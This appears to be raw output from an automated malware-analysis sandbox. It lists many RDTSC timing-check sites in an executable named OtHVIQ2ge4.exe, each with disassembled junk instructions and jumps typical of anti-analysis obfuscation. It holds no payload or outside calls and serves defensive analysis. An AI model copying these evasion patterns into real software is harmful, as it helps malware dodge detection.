                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7D1B16 second address: 7D1B2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FF628B69586h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7D1B2A second address: 7D1B36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FF628D73F56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7D1B36 second address: 7D1B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF628B69598h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7D1CF5 second address: 7D1D01 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF628D73F56h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7D1D01 second address: 7D1D19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B6958Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FF628B69586h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7D282F second address: 7D2835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7D2835 second address: 7D283B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7D283B second address: 7D2840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7D2840 second address: 7D2847 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7D60AD second address: 7D60B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7D60B3 second address: 7D60B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7D60B7 second address: 7D60D4 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF628D73F56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF628D73F5Fh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7D60D4 second address: 7D60DA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7D60DA second address: 7D610C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jo 00007FF628D73F56h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007FF628D73F63h 0x00000014 jne 00007FF628D73F56h 0x0000001a popad 0x0000001b push ebx 0x0000001c jnp 00007FF628D73F56h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7D623E second address: 7D6244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7D6534 second address: 7D653F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 747907 second address: 747911 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF628B69586h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7D9D82 second address: 7D9D9A instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF628D73F5Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7D9D9A second address: 7D9DA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7D9DA0 second address: 7D9DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jc 00007FF628D73F5Ch 0x0000000d jng 00007FF628D73F56h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7DA026 second address: 7DA033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FF628B69586h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7DFDA1 second address: 7DFDA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7DFDA7 second address: 7DFDD8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 jmp 00007FF628B69595h 0x0000001a jl 00007FF628B69586h 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7E07D3 second address: 7E07F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop eax 0x00000007 jmp 00007FF628D73F69h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7E0A8C second address: 7E0AAA instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF628B69586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FF628B69591h 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7E0AAA second address: 7E0AB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7E0D86 second address: 7E0D8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7E1051 second address: 7E106D instructions: 0x00000000 rdtsc 0x00000002 je 00007FF628D73F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF628D73F5Fh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7E106D second address: 7E107D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FF628B69586h 0x0000000a jng 00007FF628B69586h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7E1325 second address: 7E1341 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF628D73F62h 0x00000008 jg 00007FF628D73F56h 0x0000000e jnp 00007FF628D73F56h 0x00000014 push eax 0x00000015 push edx 0x00000016 ja 00007FF628D73F56h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7E1341 second address: 7E1355 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FF628B69588h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7E1355 second address: 7E1378 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FF628D73F5Eh 0x0000000a js 00007FF628D73F56h 0x00000010 jnp 00007FF628D73F56h 0x00000016 popad 0x00000017 push ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7E15DB second address: 7E15E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7E15E1 second address: 7E15E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7E15E5 second address: 7E15FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 jns 00007FF628B69586h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7E15FB second address: 7E15FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7E681D second address: 7E6860 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jbe 00007FF628B69586h 0x00000009 pop esi 0x0000000a push esi 0x0000000b jmp 00007FF628B69598h 0x00000010 je 00007FF628B69586h 0x00000016 pop esi 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jo 00007FF628B69595h 0x00000021 push esi 0x00000022 pop esi 0x00000023 jmp 00007FF628B6958Dh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7E6860 second address: 7E687B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF628D73F67h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7E687B second address: 7E687F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7E5A58 second address: 7E5A5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7E5A5C second address: 7E5A60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7E5A60 second address: 7E5A66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7E5A66 second address: 7E5ABD instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF628B69599h 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b js 00007FF628B69586h 0x00000011 jmp 00007FF628B69596h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FF628B69590h 0x00000022 jne 00007FF628B69586h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7E5ABD second address: 7E5AC7 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF628D73F56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7E5AC7 second address: 7E5ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7E5ACD second address: 7E5AD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7E6297 second address: 7E629D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7E629D second address: 7E62C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF628D73F68h 0x00000008 pushad 0x00000009 popad 0x0000000a js 00007FF628D73F56h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7E63F7 second address: 7E6410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF628B69595h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7E6410 second address: 7E6414 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7E6414 second address: 7E6426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007FF628B69586h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7E6426 second address: 7E642A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7E642A second address: 7E642E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7E6589 second address: 7E658D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 74282A second address: 74283F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FF628B69590h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7F1FA2 second address: 7F1FBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF628D73F65h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7F212B second address: 7F2136 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7F2136 second address: 7F2164 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FF628D73F5Fh 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jng 00007FF628D73F58h 0x0000001f push edx 0x00000020 pop edx 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7F2164 second address: 7F2170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FF628B69586h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7F2170 second address: 7F2175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7F2580 second address: 7F2585 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7F2585 second address: 7F25B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF628D73F56h 0x0000000a jmp 00007FF628D73F63h 0x0000000f jnc 00007FF628D73F56h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jne 00007FF628D73F56h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7F25B1 second address: 7F25DF instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF628B69586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF628B69599h 0x00000014 jnl 00007FF628B69586h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7F25DF second address: 7F25E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7F28A8 second address: 7F28B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FF628B6958Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7F28B6 second address: 7F28C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FF628D73F90h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7F28C4 second address: 7F28CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7F2A73 second address: 7F2A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7F2A79 second address: 7F2A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 js 00007FF628B69586h 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 pop eax 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 jne 00007FF628B6958Eh 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7F2C06 second address: 7F2C20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7F3C85 second address: 7F3C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7F3C8D second address: 7F3C92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7F3C92 second address: 7F3C97 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7F3C97 second address: 7F3CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jo 00007FF628D73F62h 0x0000000b jmp 00007FF628D73F5Ch 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jmp 00007FF628D73F65h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c jmp 00007FF628D73F60h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7F3CDA second address: 7F3CF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B6958Eh 0x00000007 jbe 00007FF628B69586h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7FA328 second address: 7FA33A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF628D73F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007FF628D73F56h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7FA472 second address: 7FA476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7FA476 second address: 7FA47A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7FA47A second address: 7FA482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7FA482 second address: 7FA488 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 7FA488 second address: 7FA48C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 8051BD second address: 8051C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 8051C1 second address: 8051C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 8051C5 second address: 8051E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FF628D73F67h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 808FC6 second address: 808FCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 80CFA7 second address: 80CFCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF628D73F63h 0x00000009 pop ebx 0x0000000a jmp 00007FF628D73F5Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 80CFCD second address: 80CFD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 80F254 second address: 80F25A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 80F25A second address: 80F266 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | RDTSC instruction interceptor: First address: 80F266 second address: 80F26C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
